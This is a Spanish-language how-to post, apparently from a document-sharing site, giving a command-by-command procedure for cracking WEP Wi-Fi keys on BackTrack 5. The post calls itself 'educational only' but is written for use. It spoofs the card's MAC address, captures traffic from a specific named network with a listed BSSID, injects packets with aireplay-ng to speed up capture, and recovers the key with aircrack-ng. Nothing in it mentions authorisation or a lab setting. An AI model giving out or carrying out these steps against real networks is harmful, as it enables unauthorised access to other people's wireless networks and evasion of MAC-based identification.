Backtrack5
Enviado por cealexis6 • 9 de Febrero de 2012 • 405 Palabras (2 Páginas) • 622 Visitas
MANUAL PARA ABRIR REDES DE TIPO “WEP”, SOLO DE CARÁCTER EDUCATIVO MEDIANTE LA DISTRO BACKTRACK 5 DE LINUX
Arrancar desde la unidad de CD/DVD con el BACKTRACK5 dentro de la bandeja. Además, es importante considerar y respetar la escritura de minúsculas y mayúsculas.
Arrancamos con el sistema en modo de texto, una vez que nos muestre el símbolo del sistema escribimos el comando startx.
Una vez arrancando en el ambiente grafico de BACKTRACK5 procedemos con las indicaciones siguientes.
Abrimos una consola (Shell).
iwconfig sirve para verificar como se llama mi red inalámbrica por default es wlan0 u otra.
airmon-ng stop wlan0 con esta orden detenemos y deshabilitamos nuestra tarjeta wlan0.
macchanger –m 00:11:22:33:44:55 wlan0 con esta instrucción se realiza el cambio de la mac de nuestra tarjeta de red.
airmon-ng start wlan0 Para volver a encender nuestra tarjeta de red inalámbrica y verificar que se activa el mon0.
airodump-ng wlan0 Nos despliega la lista de redes que se encuentran al alcance de nuestra tarjeta, es de suma importancia anotar los datos siguientes, ya que serán utilizados durante el proceso del hackeo de la red.
BSSID 4C:54:99:0E:2D:F1
CH 10
ESSID Infinitum0509
PwR Verificar sea mayor a -79
Nombre de archivo Pru0509
Abrimos otra consola (Shell).
airodump-ng –c 10 –w pru0509 --bssid 4C:54:99:0E:2D:F1 wlan0 Orden para comenzar a jalar los #DATA necesarios para poder descifrar la clave del modem, se recomiendan tener 20,000 paquetes en #DATA para ello, se utilizan los datos de la tabla de arriba.
Si por algún motivo va muy lento, primero tendremos que verificar si no avanza de cero en #DATA esto quiere decir que no hay gente utilizando la conexión por tal motivo no se pueden inyectar paquetes para poderla descifrar.
Si carga pero muy lento entonces seguimos la siguiente instrucción para inyectar más paquetes y acelerar la carga de los mimos.
Abrimos una nueva consola (Shell).
aireplay-ng -1 0 –a 4C:54:99:0E:2D:F1 mon0 Hacerlo tantas veces cuan sea necesario hasta que comience a habilitar la carga; para repetir la instrucción solo oprimir flecha arriba.
aireplay-ng -3 –b 4C:54:99:0E:2D:F1 mon0 Hacerlo tantas veces cuan sea necesario hasta que comience a inyectar paquetes.
Abrimos otra consola (Shell).
Una vez que tengamos cargados (puede ser con tan solo 5,000 paquetes) los 20,000 paquetes en #DATA, procedemos a poner y ejecutar la siguiente orden.
aircrack-ng pru0509-01.cap Esto nos dará como resultado la extracción de la clave que buscamos, mostrándola con el formato siguiente: [XX:XX:XX:XX:XX],
...